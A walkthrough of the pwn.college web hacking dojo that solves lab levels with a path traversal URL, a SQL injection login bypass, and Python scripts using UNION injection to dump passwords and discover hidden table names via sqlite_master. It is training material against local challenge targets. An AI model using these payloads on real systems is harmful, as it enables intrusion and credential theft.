PWN COLLGE Web Hacking

Web hacking dojo walkthrough pwn.college

Level 1

First run the challenge from /challenge

Now try path traversal with path argument

http://challenge.localhost/?path=../../flag

Level 2

Exploit a command injection vulnerability

Start the challenge

the semicolon at the end ensures that the shell knows the command sequence is complete.

Level 3

Exploit an authentication bypass vulnerability

Level 4

Exploit a structured query language injection vulnerability to login

Doing it with python

form = { "username" : 'flag" --', "password" : "idk", }
response = requests.post("http://challenge.localhost/", data=form)
print(response,"\n",response.text)

Level 5

Exploit a structured query language injection vulnerability to leak data

Code Breakdown

Fetching the Query Parameter:
```
pythonCopy codequery = request.args.get("query", "%")
```
This line retrieves a query parameter from the URL's query string. If query is not provided, it defaults to %, which is a wildcard in SQL's LIKE clause.
Executing the SQL Query:
```
pythonCopy codeusers = db.execute(f'SELECT username FROM users WHERE username LIKE "{query}"').fetchall()
```
This line constructs a SQL query using the query parameter. Since it directly inserts the query parameter into the SQL statement, it is vulnerable to SQL injection.
Returning the Results:
```
pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)
```
This line formats and returns the results of the query, joining all usernames with newline characters.

Exploiting SQL Injection

To exploit the SQL injection vulnerability, you can manipulate the query parameter to include SQL commands that alter the behavior of the query. Here's how you can do it:

Leak All Usernames:
By using the % wildcard in the LIKE clause, you can match all usernames:
URL:
```
perlCopy codehttp://example.com/path?query=%25
```
This constructs the following SQL query:
```
sqlCopy codeSELECT username FROM users WHERE username LIKE "%"
```
Since % matches any string, this will return all usernames in the users table.

and then we can append Union to dump all passwords

import requests 

params = {"query" : '" UNION SELECT password from USERS --'} 

response = requests.post("http://challenge.localhost/", params=params) 

print(response.text.strip())

Level 6

Exploit a structured query language injection vulnerability with an unknown database structure.

Table Creation:
```
pythonCopy codetable_name = f"table{hash(flag) & 0xFFFFFFFFFFFFFFFF}"
db.execute((f"CREATE TABLE IF NOT EXISTS {table_name} AS "
            'SELECT "flag" AS username, ? AS password'),
           (flag,))
```
- The code first creates a table with a name based on a hash of the flag. The hash ensures the table name is unique and difficult to guess.
- The table contains a single row with "flag" as the username and the actual flag value as the password.
Query Parameter Handling:
```
pythonCopy codequery = request.args.get("query", "%")
```
- The query parameter is retrieved from the URL's query string. If query is not provided, it defaults to %, which is a wildcard in SQL's LIKE clause.
SQL Query Execution:
```
pythonCopy codeusers = db.execute(f'SELECT username FROM {table_name} WHERE username LIKE "{query}"').fetchall()
```
- This line constructs and executes a SQL query to select usernames from the dynamically named table where the username matches the query parameter.
Returning the Results:
```
pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)
```
- The code joins all the retrieved usernames with newline characters and returns them as a response.

import requests 

params = {"query": '" UNION SELECT tbl_name from sqlite_master --'} 

response = requests.post("http://challenge.localhost/", params=params) 

t_name = response.text.strip()

params = {"query": f'" UNION SELECT password from {t_name} --' }

response = requests.post("http://challenge.localhost/", params=params) 

print(response.text.strip())

PreviousPWN.COLLEGE Talking Web NextINE

Last updated 1 year ago